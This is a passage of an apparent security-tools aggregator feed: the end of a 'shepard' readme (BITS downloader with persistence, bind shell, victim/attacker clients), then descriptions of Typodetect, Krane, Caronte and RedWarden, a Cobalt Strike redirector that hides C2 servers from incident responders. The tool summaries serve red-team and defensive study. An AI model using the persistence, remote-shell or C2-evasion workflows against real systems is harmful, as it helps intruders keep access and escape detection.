-d remoteLocation, writePath: regular file download to a local path of your choice

-e remoteLocation, localPath: regular file upload from a local path of your choice (only sends to IIS server, this is a limitation with BITS)

-dr remoteLocation, writePath, [optionalFileArgs]: file download to a path of your choice, and will attempt to maintain persitance. The downloaded file will attempt to run with optionalFileArgs and BITS will check back every 30 seconds to make sure the file is still running on the compromised system.

Running this executable with no arguments or an incorrect amount of arguments will cause shepard to exit cleanly.


BINDSHELL

The server (victim) is written using C#. It listens on port 6006.

Usage: run shepardsbind_serv.exe with no arguments.

The client (attacker) is written using Python and takes one argument: the IP address of the victim's machine. Usage: run shepardsbind_recv.py with one argument: <victim's IP>

Running shepardsbind_recv.py with no arguments will return an error. The prompt will look like: %SBS%


Using them in conjunction

The only executable that must be on the victim's machine is shepard.exe. Host the download bindshell executable to a publicly accessible place. Shepard will download and run the bindshell executable, and the user can now use the python reciever. If the shell is found and killed, it will restart after 30 seconds. Last steps in progress: finding out how to rerun shepard.exe to redownload in case the shell executable is deleted. Most likely will use a service



Typodetect - Detect The Active Mutations Of Domains

$
0
0


This tool gives blue teams, SOC's, researchers and companies the ability to detect the active mutations of their domains, thus preventing the use of these domains in fraudulent activities, such as phishing and smishing.

For this, Typodetect allows the use of the latest available version of the TLDs (Top Level Domains) published on the IANA website, the validation of decentralized domains in Blockchain DNS and the malware reports in DoH services (DNS over HTTPS) .

For the ease of the user, Typodetect delivers the report in JSON format by default, or in TXT format, depending on how the user selects and shows on the screen a summary of the mutations generated, the active domains and the reports detected with Malware or decentralized domains.


Installation

Clone this repository with:

git clone https://github.com/Telefonica/typodetect

Run setup for installation:

python3 pip install -r requirements.txt

Running TypoDetect

Inside the TypoDetect directory:

python3 typodetect.py -h
usage: typodetect.py [-h] [-u UPDATE] [-t N_THREADS] [-d DOH_SERVER] [-o OUTPUT] domain

positional arguments:
domain specify domain to process

optional arguments:
-h, --help show this help message and exit
-u UPDATE, --update UPDATE
(Y/N) for update TLD's database (default:N)
-t N_THREADS, --threads N_THREADS
Number of threads for processing (default:5)
-d DOH_SERVER, --doh DOH_SERVER
Section DoH for use: [1] ElevenPaths (default) [2] Cloudfare
-o OUTPUT, --output OUTPUT
JSON or TXT, options of filetype (default:JSON)

For a simple analysis:

python3 typodetect.py <domain>

For update IANA database and analysis:

python3 typodetect.py -u y <domain>

For more threads analysis:

python3 typodetect.py -t <number of threads> <domain>

For a different DoH (currently only has ElevenPaths o CloudFare)

python3 typodetect.py -d 2 <domain>

For create TXT report

python3 typodetect.py -o TXT <domain>

Reports

Inside the reports directory, the report file is saved, by default in JSON, with the name of the analyzed domain and the date, for example:

elevenpaths.com2021-01-26T18:20:10.34568.json

The JSON report has the following structure for each active mutation detected:

{ id: 
"report_DoH" : <string>
"domain": <string>
"A": [ip1, ip2, ...]
"MX": [mx1, mx2, ...]
}

The fields contain the following information:

id: Integer id of mutation
"report_DoH": "" - Domain of Descentralised DNS
"Malware" - Domain reported as dangerous for DoH
"Good" - Domain reported as good for DoH
"domain": Mutation detected as active.
"A": IP's address of A type in DNS of the mutation.
"MX": IP's or CNAME of MX type in DNS of the mutation.


Krane - Kubernetes RBAC Static Analysis And Visualisation Tool

$
0
0


Krane is a simple Kubernetes RBAC static analysis tool. It identifies potential security risks in K8s RBAC design and makes suggestions on how to mitigate them. Krane dashboard presents current RBAC security posture and lets you navigate through its definition.


Features
  • RBAC Risk rules - Krane evaluates a set of built-in RBAC risk rules. These can be modified or extended with a set of custom rules.
  • Portability - Krane can run in one of the following modes:
    • Locally as a CLI or docker container.
    • In CI/CD pipelines as a step action detecting potential RBAC flaws before it gets applied to the cluster.
    • As a standalone service continuously analysing state of RBAC within a Kubernetes cluster.
  • Reporting - Krane produces an easy to understand RBAC risk report in machine-readable format.
  • Dashboard - Krane comes with a simple Dashboard UI helping you understand in-cluster RBAC design. Dashboard presents high-level overview of RBAC security posture and highlights detected risks. It also allows for further RBAC controls inspection via faceted tree and graph network views.
  • Alerting - It will alert on detected medium and high severity risks via its Slack integration.
  • RBAC in the Graph - Krane indexes entirety of Kubernetes RBAC in a local Graph database which makes any further ad-hoc interrogating of RBAC data easy, with arbitrary CypherQL queries.

Local Quick Start

Get started locally with Docker Compose.


Prerequisites

It is assumed that you have docker running on your local machine. Install docker-compose if you haven't already.


Run Krane locally

Krane depends on RedisGraph. docker-compose stack defines all what's required to build and run Krane service locally. It'll also take care of its RedisGraph dependency.

docker-compose up -d

Krane docker image will be pre-built automatically if not already present on local machine.

Note that when running docker-compose locally, Krane won't start RBAC report and dashboard automatically. Instead, the container will sleep for 24h by default - this value can be adjusted in docker-compose.override.yml. Exec into a running Krane container to run commands. Local docker-compose will also mount kube config (~/.kube/config) inside the container enabling you to run reports against any Kubernetes clusters to which you already have access to.

# Exec into a running Krane container

docker-compose exec krane bash

# Once in the container you can start using `krane` commands. Try `krane -help`.

$ krane -h

To inspect what services are running and the associated ports:

docker-compose ps

To stop Krane and its dependency services:

docker-compose down

Usage Guide

Commands
$ krane --help

NAME:

krane

DESCRIPTION:

Kubernetes RBAC static analysis & visualisation tool

COMMANDS:

dashboard Start K8s RBAC dashboard server
help Display global or [command] help documentation
report Run K8s RBAC report

GLOBAL OPTIONS:

-h, --help
Display help documentation

-v, --version
Display version information

-t, --trace
Display backtrace when an error occurs

AUTHOR:

Marcin Ciszak <marcin.ciszak@appvia.io> - Appvia Ltd <appvia.io>

Generate RBAC report

With local kubectl context

To run a report against a running cluster you must provide a kubectl context

krane report -k <context>

You may also pass -c <cluster-name> flag if you plan to run the tool against multiple clusters and index RBAC graph separately for each cluster name.


From RBAC files stored in directory

To run a report against local RBAC yaml/json files, provide a directory path

krane report -d </path/to/rbac-directory>

NOTE: Krane expects the following files (in either YAML or JSON format) to be present in specified directory path:

  • psp
  • roles
  • clusterroles
  • rolebindings
  • clusterrolebindings

Inside a Kubernetes cluster

To run a report from a container running in Kubernetes cluster

krane report --incluster

NOTE: Service account used by Krane will require access to RBAC resources. See Prerequisites for details.


In CI/CD pipeline

To validate RBAC definition as a step in CI/CD pipeline

krane report --ci -d </path/to/rbac-directory>

NOTE: Krane expects certain naming convention to be followed for locally stored RBAC resource files. See section above. In order to run krane commands it's recommended that CI executor references quay.io/appvia/krane:latest docker image.

CI mode is enabled by --ci flag. Krane will return non zero status code along with details of breaking risk rules when one or more dangers have been detected.


Visualisation Dashboard

To view RBAC facets tree, network graph and latest report findings you need to start dashboard server first.

krane dashboard

Cluster flag -c <cluster-name> may be passed if you want to run the dashboard against specific cluster name. Dashboard will look for data related to specified cluster name which is cached on the file system.

Command above will start local web server on default port 8000, and display the dashboard link.


Architecture

RBAC Data indexed in a local Graph database

Krane indexes RBAC entites in RedisGraph. This allows us to query network of dependencies efficiently and simply using subset of CypherQL supported by RedisGraph.


Schema



Nodes

The following nodes are created in the Graph for the relevant RBAC objects:

  • Psp - A PSP node containing attributes around the pod security policy.
  • Rule - Rule node represents access control rule around Kubernetes resources.
  • Role - Role node represents a given Role or ClusterRole. kind attribute defines type of role.
  • Subject - Subject represents all possible actors in the cluster (kind: User, Group and ServiceAccount)
  • Namespace - Kubernetes Namespace node.

Edges
  • :SECURITY - Defines a link between Rule and Psp nodes.
  • :GRANT - Defines a link between Role and Rule associated with that role.
  • :ASSIGN - Defines a link between an Actor (Subject) and given Role/ClusterRole (Role node).
  • :RELATION - Defines a link between two different Actor (Subject) nodes.
  • :SCOPE - Defines a link between Role and Namespace nodes.
  • :ACCESS - Defines a link between Subject and Namespace nodes.
  • :AGGREGATE - Defines a link between ClusterRoles (one ClusterRole aggregates another) A-(aggregates)->B
  • :COMPOSITE - Defines a link between ClusterRoles (one ClusterRole can be aggregated in another) A<-(is a composite of)-B

All edges are bidirectional, which means graph can be queried in either direction. Only exceptions are :AGGREGATE and :COMPOSITE relations which are uni-directional, though concerned with the same edge nodes.


Querying the Graph

In order to query the graph directly you can exec into a running redisgraph container, start redis-cli and run your arbitrary queries. Follow official instructions for examples of commands.

You can also query the Graph from Krane console. First exec into running Krane container, then

# Start Krane console - this will open interactive ruby shell with Krane code preloaded

console

# Instantiate Graph client

graph = Krane::Clients::RedisGraph.client cluster: 'default'

# Run arbitrary CypherQL query against indexed RBAC Graph

res = graph.query(%Q(
MATCH (r:Rule {resource: "configmaps", verb: "update"})<-[:GRANT]-(ro:Role)<-[:ASSIGN]-(s:Subject)
RETURN s.kind as subject_kind, s.name as subject_name, ro.kind as role_kind, ro.name as role_name))

# Print the results

res.print_resultset
# Results...
+----------------+--------------------------------+-----------+------------------------------------------------+
| subject_kind | subject_name | role_kind | role_name |
+----------------+--------------------------------+-----------+------------------------------------------------+
| ServiceAccount | bootstrap-signer | Role | system:controller:bootstrap-signer |
| User | system:kube-controller-manager | Role | system::leader-locking-kube-controller-manager |
| ServiceAccount | kube-controller-manager | Role | system::leader-locking-kube-controller-manager |
| User | system:kube-scheduler | Role | system::leader-locking-kube-scheduler |
| ServiceAccount | kube-scheduler | Role | system::leader-locking-kube-scheduler |
+----------------+-------------- ------------------+-----------+------------------------------------------------+

Note: Example query above will select all Subjects with assigned Roles/ClusterRoles granting access to update configmaps.


Configuration

RBAC Risk Rules

RBAC risk rules are defined in the Rules file. The structure of each rule is largely self-explanatory. Built-in set can be expanded / overridden by adding extra custom rules to the Cutom Rules file.


Risk Rule Macros

Macros are "containers" for a set of common/shared attributes, and referenced by one or more risk rules. If you choose to use macro in a given risk rule you would need to reference it by name, e.g. macro: <macro-name>. Note that attributes defined in referenced macro will take precedence over the same attributes defined on the rule level.

Macro can contain any of the following attributes:

  • query - RedisGraph query. Has precedence over template. Requires writer to be defined.
  • writer - Writer is a Ruby expression used to format query result set. Writer has precedence over template.
  • template - Built-in query/writer template name. If query& writer are not specified then chosen query generator will be used along with matching writer.

Risk Rule attributes

Rule can contain any of the following attributes:

  • id [Required] Rule id is a unique rule identifier.

  • group_title [Required] Title applying to all items falling under this risk check.

  • severity [Required] Severity, as one of :danger, :warning, :info.

  • info [Required] Textual information about the check and suggestions on how to mitigate the risk.

  • query [Conditonal] RedisGraph query.

    • Has precedence over template. Requires writer to be defined.
  • writer [Conditonal] Writer is a Ruby expression used to format query result set.

    • Writer has precedence over template. Requires query to be defined.
  • template [Conditonal] Built-in query/writer template name. If query& writer are not specified then chosen query generator will be used along with matching writer.

    • Some built-in templates require match_rules attribute to be specified on individual rule level in order to build correct query. Templates currently requiring it:

      • risky-role - Builds multi-match graph query based on the access rules specified by match_rules. Generated graph query returns the following columns:
        • role_name
        • role_kind
        • namespace_name (an array is returned if multiple items returned)
  • match_rules [Conditonal] Required when template relies on match rules in order to build a query.

  • custom_params [Optional] List of custom key-value pairs to be evaluated and replaced in a rule query and writer representation.

    • Example:
      custom_params:
      - attrA: valueA
      - attrB: valueB
      Template placeholders for the keys above {{attrA}} and {{attrB}} will be replaced with valueA and valueB respectively.
  • threshold [Optional] Numeric value. When definied this will become available as template placeholder {{threshold}} in the writer expression.

  • macro [Optional] Reference to common parameters defined in a named macro.

  • disabled [Optional] When set to true it'll disable given rule and exclude it from evaluation. By default all rules are enabled.


Risk Rule examples

Explicit query & writer expression
- id: verbose-rule-example
group_title: Example rule
severity: :danger
info: Risk description and instructions on how to mitigate it goes here
query: |
MATCH
(s:Subject)-[:ACCESS]->(ns:Namespace)
WHERE
NOT s.name IN {{whitelist_subject_names}}
RETURN
s.kind as subject_kind,
s.name as subject_name,
COLLECT(ns.name) as namespace_names
ORDER BY
subject_kind,
subject_name,
namespace_names DESC
threshold: 2
writer: |
if result.namespace_names.count > {{threshold}}
"#{result.subject_kind} #{result.subject_name} can access namespaces: #{result.namespace_names.join(', ')}"
end
disabled: true

The example above explicitly defines a graph query which is used to evaluate RBAC risk, and a writer expression used to format query result set. The query simply selects all Subjects (excluding whitelisted) and Namespaces to which they have access to. Note that the result set will only include Subjects having access to more than 2Namespaces (Noticed threshold value there?). Last writer's expression will be captured as formatted result item output.

writer can access the result set item via result object with methods matching elements returned by the query, e.g. result.subject_kind, result.subject_name etc.

Note:

  • {{threshold}} placeholder in the writer expression will be replaced by the rule's threshold keyword value.
  • {{whitelist_subject_names}} represents a custom field which will be interpolated with Whitelist values defined for a given rule id. If a placeholder field name is not defined in the whitelist it'll be substituted with an empty array [''] by default. Read more on whitelisting below.

Templated Risk Rule

Built-in templates simplify risk rule definition significantly, however, they are designed to extract specific kind of information and may not be a good fit for your custom rules. If you find yourself reusing the same query or writer expressions across multiple rules, you should consider extracting those to a macro and reference it in your custom rules to DRY them up.

- id: risky-any-verb-secrets
group_title: Risky Roles/ClustersRoles allowing all actions on secrets
severity: :danger
info: Roles/ClusterRoles allowing all actions on secrets. This might be dangerous. Review listed Roles!
template: risky-role
match_rules:
- resources: ['secrets']
verbs: ['*']

Example above shows one of the built-in rules. It references risky-role template which upon processing will expand the rule by injecting query and writer expressions before rule evalutation triggers. match_rules will be used to build appropriate match query.


RBAC Risk Whitelist

Optional whitelist contains a set of custom defined attribute names and respective (whitelisted) values.


Whitelist attributes

Attribute names and their values are arbitrary. They are defined in the Whitelist file and divided into three separate sections:

  • global - Top level scope. Custom attributes defined here will apply to all Risk Rules regardless of the cluster name.
  • common - Custom attributes will be scoped to specific Risk Rule id regardless of the cluster name.
  • cluster (with nested list of cluster names) - Custom attributes will apply to specific Risk Rule id for a given cluster name.

Each Risk Rule, upon evaluation, will attempt to interpolate all parameter placeholders used in the query, e.g. {{your_whitelist_attribute_name}}. If a placeholder parameter name (i.e. a name between the double curly brackets) matches any of the whitelisted attribute names for that Risk Rule id, it will be replaced with its calculated value. If no values are found for a given placeholder, it'll be substituted with [''].


Whitelist examples

Example whitelist below produces the following placeholder-key => value mapping for a Risk Rule with id attribute value matching "some-risk-rule-id"

{{whitelist_role_names}}    => ['acp:prometheus:operator']
{{whitelist_subject_names}} => ['privileged-psp-user', 'another-user']

The placeholder keys above, when used in the custom graph queries, will be replaced by their respective values upon Risk Rule evaluation.

Example:

---
rules:
global: # global scope - applies to all risk rule and cluster names
whitelist_role_names: # custom attribute name
- acp:prometheus:operator # custom attribute values

common: # common scope - applies to specific risk rule id regardless of cluster name
some-risk-rule-id: # this corresponds to risk rule id defined in config/rules.yaml
whitelist_subject_names: # custom attribute name
- privileged-psp-user # custom attribute values

cluster: # cluster scope - applies to speciifc risk rule id and cluster name
default: # example cluster name
some-risk-rule-id: # risk rule id
whitelist_subject_names: # custom attribute nane
- another-user # custom attribute values

Kubernetes Deployment

Krane can be deployed to a local or remote Kubernetes clusters easily.


K8s Prerequisites

Kubernetes namespace, service account along with appropriate RBAC must be present in the cluster. See the Prerequisites for reference.

Default Krane entrypoint executes bin/in-cluster-run which waits for RedisGraph instance to become available before starting RBAC report loop and dashboard web server.

You may control certain aspects of in-cluster execution with the following environment variables:

  • KRANE_REPORT_INTERVAL - Defines interval in seconds for RBAC static analysis report run. Default: 300 (in seconds, i.e. 5 minutes).
  • KRANE_REPORT_OUTPUT - Defines RBAC risk report output format. Possible values :json, :yaml, :none. Default: :json.

Local or Remote K8s Cluster

If your K8s cluster comes with built-in Compose-on-Kubernetes controller support (docker-desktop supports it by default), then you can deploy Krane and its dependencies with a single docker stack command:

docker stack deploy \
--orchestrator kubernetes \
--namespace krane \
--compose-file docker-compose.yml \
--compose-file docker-compose.k8s.yml krane

Note: Make sure your current kube context is set correctly prior to running the command above!

The application Stack should be now deployed to a Kubernetes cluster and all services ready and exposed. Note that Krane will automatically start its report loop and dashboard server.

$ docker stack services --orchestrator kubernetes --namespace krane krane

ID NAME MODE REPLICAS IMAGE PORTS
0de30651-dd5 krane_redisgraph replicated 1/1 redislabs/redisgraph:1.99.7 *:6379->6379/tcp
aa377a5f-62b krane_krane replicated 1/1 quay.io/appvia/krane:latest *:8000->8000/tcp

Check your Kubernetes cluster RBAC security posture by visiting

http://localhost:8000

Note that for remote cluster deployments you'll likely need to port-forward Krane service first

kubectl --context=my-remote-cluster --namespace=krane port-forward svc/krane 8000

To delete the Stack

docker stack rm krane \
--orchestrator kubernetes \
--namespace krane

Alternatively, deploy with kubectl:

kubectl create \
--context docker-desktop \
--namespace krane \
-f k8s/redisgraph-service.yaml \
-f k8s/redisgraph-deployment.yaml \
-f k8s/krane-service.yaml \
-f k8s/krane-deployment.yaml

Note that Krane dashboard services are not exposed by default!

kubectl port-forward svc/krane 8000 \
--context=docker-desktop \
--namespace=krane

# Open Krane dashboard

http://localhost:8000

You can find the example deployment manifests in k8s directory.

Modify manifests as required for your deployments making sure you reference the correct version of Krane docker image in its deployment file. See Krane Docker Registry for available tags, or just use latest.


Notifications

Krane will notify you about detected anomalies of medium and high severity via its Slack integration.

To enable notifications specify Slack webhook_url& channel in the config/config.yaml file, or alternatively set both SLACK_WEBHOOK_URL and SLACK_CHANNEL environment variables. Environment variables will take precedence over config file values.


Local Development

This section describes steps to enable local development.


Setup

Install Krane code dependencies with

./bin/setup

Dependencies

Krane depends on RedisGraph. docker-compose is the quickest way to get Krane's dependencies running locally.

docker-compose up -d redisgraph

To inspect RedisGraph service is up:

docker-compose ps

To stop services:

docker-compose down

Development

At this point you should be able to modify Krane codebase and test results by invoking commands in local shell.

./bin/krane --help                    # to get help
./bin/krane report -k docker-desktop # to generate your first report for
# local docker-desktop k8s cluster
...

To enable Dashboard UI local development mode

cd dashboard
npm install
npm start

This will automatically start the Dashboard server, open default browser and watch for source files changes.

Krane comes preconfigured for improved developer experience with Skaffold. Iterating on the project and validating the application by running the entire stack in local or remote Kubernetes cluster just got easier. Code hot-reload enables local changes to be automatically propagated to the running container for faster development lifecycle.

skaffold dev --kube-context docker-desktop --namespace krane --port-forward

Tests

Run tests locally with

bundle exec rspec

Contributing to Krane

We welcome any contributions from the community! Have a look at our contribution guide for more information on how to get started. If you use Krane, find it useful, or are generally interested in Kubernetes security then please let us know by Starring and Watching this repo. Thanks!


Community

//TODO


Roadmap

See our Roadmap for details about our plans for the project.



Caronte - A Tool To Analyze The Network Flow During Attack/Defence Capture The Flag Competitions

$
0
0


Caronte is a tool to analyze the network flow during capture the flag events of type attack/defence. It reassembles TCP packets captured in pcap files to rebuild TCP connections, and analyzes each connection to find user-defined patterns. The patterns can be defined as regex or using protocol specific rules. The connection flows are saved into a database and can be visualized with the web application. REST API are also provided.


Features
  • immediate installation with docker-compose
  • no configuration file, settings can be changed via GUI or API
  • pcaps to be analyzed can be loaded via curl, either locally or remotely, or via the GUI
    • it is also possible to download the pcaps from the GUI and see all the analysis statistics for each pcap
  • rules can be created to identify connections that contain certain strings
    • pattern matching is done through regular expressions (regex)
    • regex in UTF-8 and Unicode format are also supported
  • connections can be labeled by type of service, identified by the port number
    • each service can be assigned a different color
  • ability to filter connections by addresses, ports, dimensions, time, duration, matched rules
  • a timeline shows statistics with different metrics sampled per minute
    • some of these metrics are connections_per_service, client_bytes_per_service, server_bytes_per_service, duration_per service, matched_rules
      • with matched_rules metric it can be possible to see the relationship between flag_in and flag_out
    • the timeline contains a sliding window which can be used to search for connections in a certain time interval
  • advanced search by term, negated term, exact phrase, regex, negated regex
    • the performed searches are saved to be instantly repeated the following times
  • the detected HTTP connections are automatically reconstructed
    • HTTP requests can be replicated through curl, fetch and python requests
    • compressed HTTP responses (gzip/deflate) are automatically decompressed
  • ability to export and view the content of connections in various formats, including hex and base64
  • JSON content is displayed in a JSON tree viewer, HTML code can be rendered in a separate window
  • occurrences of matched rules are highlighted in the connection content view
  • supports both IPv4 and IPv6 addresses
    • if more addresses are assigned to the vulnerable machine to be defended, a CIDR address can be used

Installation

There are two ways to install Caronte:

  • with Docker and docker-compose, the fastest and easiest way
  • manually installing dependencies and compiling the project

Run with Docker

The only things to do are:

  • clone the repo, with git clone https://github.com/eciavatta/caronte.git
  • inside the caronte folder, run docker-compose up -d
  • wait for the image to be compiled and open browser at http://localhost:3333

Manually installation

The first thing to do is to install the dependencies:

Next you need to compile the project, which is composed of two parts:

  • the backend, which can be compiled with go mod download && go build
  • the frontend, which can be compiled with cd frontend && yarn install && yarn build

Before running Caronte starts an instance of MongoDB https://docs.mongodb.com/manual/administration/install-community/ that has no authentication. Be careful not to expose the MongoDB port on the public interface.

Run the binary with ./caronte. The available configuration options are:

-bind-address    address where server is bind (default "0.0.0.0")  -bind-port       port where server is bind (default 3333)  -db-name         name of database to use (default "caronte")  -mongo-host      address of MongoDB (default "localhost")  -mongo-port      port of MongoDB (default 27017)  

Configuration

The configuration takes place at runtime on the first start via the graphical interface or via API. It is necessary to setup:

  • the server_address: the ip address of the vulnerable machine. Must be the destination address of all the connections in the pcaps. If each vulnerable service has an own ip, this param accept also a CIDR address. The address can be either IPv4 both IPv6
  • the flag_regex: the regular expression that matches a flag. Usually provided on the competition rules page
  • auth_required: if true a basic authentication is enabled to protect the analyzer
  • an optional accounts array, which contains the credentials of authorized users

Documentation

The backend, written in Go language, it is designed as a service. It exposes REST API that are used by the frontend written using React. The list of available APIs with their explanation is available here: https://app.swaggerhub.com/apis-docs/eciavatta/caronte/WIP


Screenshots

Below there are some screenshots showing the main features of the tool.


Main window, with connections list and stream content


Main window, with the timeline expanded


Rules and services view


Searches and pcaps view

RedWarden - Flexible CobaltStrike Malleable Redirector

$
0
0


RedWarden - Flexible CobaltStrike Malleable Redirector

(previously known as proxy2'smalleable_redirector plugin)

Let's raise the bar in C2 redirectors IR resiliency, shall we?


Red Teaming business has seen severaldifferentgreat ideas on how to combat incident responders and misdirect them while offering resistant C2 redirectors network at the same time.

This work combines many of those great ideas into a one, lightweight utility, mimicking Apache2 in it's roots of being a simple HTTP(S) reverse-proxy.

Combining Malleable C2 profiles understanding, knowledge of bad IP addresses pool and a flexibility of easily adding new inspection and misrouting logic - resulted in having a crafty repellent for IR inspections.



Should any invalid inbound packet reach RedWarden - you can redirect, reset or just proxy it away!


Abstract

This program acts as a HTTP/HTTPS reverse-proxy with several restrictions imposed upon inbound C2 HTTP requests selecting which packets to direct to the Teamserver and which to drop, similarly to the .htaccess file restrictions mandated in Apache2's mod_rewrite.

RedWarden was created to solve the problem of IR/AV/EDRs/Sandboxes evasion on the C2 redirector layer. It's intended to supersede classical Apache2 + mod_rewrite setups used for that purpose.

Features:

  • Malleable C2 Profile parser able to validate inbound HTTP/S requests strictly according to malleable's contract and drop outlaying packets in case of violation (Malleable Profiles 4.0+ with variants covered)
  • Ability to unfilter/repair unexpected and unwanted HTTP headers added by interim systems such as proxies and caches (think CloudFlare) in order to conform to a valid Malleable contract.
  • Integrated curated massive blacklist of IPv4 pools and ranges known to be associated with IT Security vendors
  • Grepable output log entries (in both Apache2 combined access log and custom RedWarden formats) useful to track peer connectivity events/issues
  • Ability to query connecting peer's IPv4 address against IP Geolocation/whois information and confront that with predefined regular expressions to rule out peers connecting outside of trusted organizations/countries/cities etc.
  • Built-in Replay attacks mitigation enforced by logging accepted requests' MD5 hashsums into locally stored SQLite database and preventing requests previously accepted.
  • Allows to define ProxyPass statemtents to pass requests matching specific URL onto other Hosts
  • Support for multiple Teamservers
  • Support for many reverse-proxying Hosts/redirection sites giving in a randomized order - which lets load-balance traffic or build more versatile infrastructures
  • Can repair HTTP packets according to expected malleable contract in case some of the headers were corrupted in traffic
  • Sleepless nights spent on troubleshooting "why my Beacon doesn't work over CloudFlare/CDN/Domain Fronting" are over now thanks to detailed verbose HTTP(S) requests/responses logs

The RedWarden takes Malleable C2 profile and teamserver's hostname:port on its input. It then parses supplied malleable profile sections to understand the contract and pass through only those inbound requests that satisfied it while misdirecting others.

Sections such as http-stager, http-get, http-post and their corresponding uris, headers, prepend/append patterns, User-Agent are all used to distinguish between legitimate beacon's request and unrelated Internet noise or IR/AV/EDRs out of bound packets.

The program benefits from the marvelous known bad IP ranges coming from: curi0usJack and the others: https://gist.github.com/curi0usJack/971385e8334e189d93a6cb4671238b10

Using an IP addresses blacklisting along with known bad keywords lookup through Reverse-IP DNS queries and HTTP headers inspection, brings the reliability to considerably increase redirector's resiliency to the unauthorized peers wanting to examine attacker infrastructures.

Invalid packets may be misrouted according to three strategies:

  • redirect: Simply redirect peer to another websites, such as Rick Roll.
  • reset: Kill TCP connection straightaway.
  • proxy: Fetch a response from another website, to mimic cloned/hijacked website as closely as possible.

This configuration is mandated in configuration file:

#
# What to do with the request originating not conforming to Beacon, whitelisting or
# ProxyPass inclusive statements:
# - 'redirect' it to another host with (HTTP 301),
# - 'reset' a TCP connection with connecting client
# - 'proxy' the request, acting as a reverse-proxy against specified action_url
# (may be dangerous if client fetches something it shouldn't supposed to see!)
#
# Valid values: 'reset', 'redirect', 'proxy'.
#
# Default: redirect
#
drop_action: redirect

Below example shows outcome of redirect to https://googole.com:



Use wisely, stay safe.


Requirements

This program can run only on Linux systems as it uses fork to spawn multiple processes.

Also, the openssl system command is expected to be installed as it is used to generate SSL certificates.

Finally, install all of the Python3 PIP requirements easily with:

bash $ sudo pip3 install -r requirements.txt

Usage

Example usage

The minimal RedWarden's config.yaml configuration file could contain:

port:
- 80/http
- 443/https

profile: jquery-c2.3.14.profile

ssl_cacert: /etc/letsencrypt/live/attacker.com/fullchain.pem
ssl_cakey: /etc/letsencrypt/live/attacker.com/privkey.pem

teamserver_url:
- 1.2.3.4:8080

drop_action: reset

Then, the program can be launched by giving it a path to the config file:

bash$ sudo python3 RedWarden.py -c config.yaml

[INFO] 19:21:42: Loading 1 plugin...
[INFO] 19:21:42: Plugin "malleable_redirector" has been installed.
[INFO] 19:21:42: Preparing SSL certificates and keys for https traffic interception...
[INFO] 19:21:42: Using provided CA key file: ca-cert/ca.key
[INFO] 19:21:42: Using provided CA certificate file: ca-cert/ca.crt
[INFO] 19:21:42: Using provided Certificate key: ca-cert/cert.key
[INFO] 19:21:42: Serving http proxy on: 0.0.0.0, port: 80...
[INFO] 19:21:42: Serving https proxy on: 0.0.0.0, port: 443...
[INFO] 19:21:42: [REQUEST] GET /jquery-3.3.1.min.js
[INFO] 19:21:42: == Valid malleable http-get request inbound.
[INFO] 19:21:42: Plugin redirected request from [code.jquery.com] to [1.2.3.4:8080]
[INFO] 19:21:42: [RESPONSE] HTTP 200 OK, length: 5543
[INFO] 19:21:45: [REQUEST] GET /jquery-3.3.1.min.js
[INFO] 19:21:45: == Valid malleable http-get request inbound.
[INFO] 19:21:45: Plugin redirected request from [code.jquery.com] to [1.2.3.4:8080]
[INFO] 19:21:45: [RESPONSE] HTTP 200 OK, length: 5543
[INFO] 19:21:46: [REQUEST] GET /
[...]
[ERROR] 19:24:46: [DROP, reason:1] inbound User-Agent differs from the one defined in C2 profile.
[...]
[INFO] 19:24:46: [RESPONSE] HTTP 301 Moved Permanently, length: 212
[INFO] 19:24:48: [REQUEST] GET /jquery-3.3.1.min.js
[INFO] 19:24:48: == Valid malleable http-get request inbound.
[INFO] 19:24:48: Plugin redirected request from [code.jquery.com] to [1.2.3.4:8080]
[...]

The above output contains a line pointing out that there has been an unauthorized, not compliant with our C2 profile inbound request, which got dropped due to incompatible User-Agent string presented:

  [...]
[DROP, reason:1] inbound User-Agent differs from the one defined in C2 profile.
[...]

Use Cases

Impose IP Geolocation on your Beacon traffic originators

You've done your Pre-Phish and OSINT very well. You now know where your targets live and have some clues where traffic should be originating from, or at least how to detect completely auxiliary traffic. How to impose IP Geolocation on Beacon requests on a redirector?

RedWarden comes at help!

Let's say, you want only to accept traffic originating from Poland, Europe. Your Pre-Phish/OSINT results indicate that:

  • 89.64.64.150 is a legitimate IP of one of your targets, originating from Poland
  • 59.99.140.76 whereas this one is not and it reached your systems as a regular Internet noise packet.

You can use RedWarden's utility lib/ipLookupHelper.py to collect IP Geo metadata about these two addresses:

bash$ python3 ipLookupHelper.py

Usage: ./ipLookupHelper.py <ipaddress> [malleable-redirector-config]

Use this small utility to collect IP Lookup details on your target IPv4 address and verify whether
your 'ip_geolocation_requirements' section of proxy2 malleable-redirector-config.yaml would match that
IP address. If second param is not given - no

The former brings:

bash$ python3 ipLookupHelper.py 89.64.64.150
[dbg] Following IP Lookup providers will be used: ['ip_api_com', 'ipapi_co']
[.] Lookup of: 89.64.64.150
[dbg] Calling IP Lookup provider: ipapi_co
[dbg] Calling IP Lookup provider: ip_api_com
[dbg] New IP lookup entry cached: 89.64.64.150
[.] Output:
{
"organization": [
"UPC Polska Sp. z o.o.",
"UPC.pl",
"AS6830 Liberty Global B.V."
],
"continent": "Europe",
"continent_code": "EU",
"country": "Poland",
"country_code": "PL",
"ip": "89.64.64.150",
"city": "Warsaw",
"timezone": "Europe/Warsaw",
"fulldata": {
"status": "success",
"country": "Poland",
"countryCode": "PL",
"region": "14",
"regionName": "Mazovia",
"city": "Warsaw",
"zip": "00-202",
"lat": 52.2484,
"lon": 21.0026,
"timezone": "Europe/Warsaw",
"isp": "UPC.pl",
"or g": "UPC Polska Sp. z o.o.",
"as": "AS6830 Liberty Global B.V.",
"query": "89.64.64.150"
},
"reverse_ip": "89-64-64-150.dynamic.chello.pl"
}

and the latter gives:

bash$ python3 ipLookupHelper.py 59.99.140.76
[dbg] Following IP Lookup providers will be used: ['ip_api_com', 'ipapi_co']
[dbg] Read 1 cached entries from file.
[.] Lookup of: 59.99.140.76
[dbg] Calling IP Lookup provider: ip_api_com
[dbg] New IP lookup entry cached: 59.99.140.76
[.] Output:
{
"organization": [
"",
"BSNL Internet",
"AS9829 National Internet Backbone"
],
"continent": "Asia",
"continent_code": "AS",
"country": "India",
"country_code": "IN",
"ip": "59.99.140.76",
"city": "Palakkad",
"timezone": "Asia/Kolkata",
"fulldata": {
"status": "success",
"country": "India",
"countryCode": "IN",
"region": "KL",
"regionName": "Kerala",
"city": "Palakkad",
"zip": "678001",
"lat": 10.7739,
"lon": 76.6487,
"timezone": "Asia/Kolkata",
"isp": "BSNL Internet",
"org": "",
"as": "AS9829 National Internet Backbone",
"query": "59.99.140.76"
},
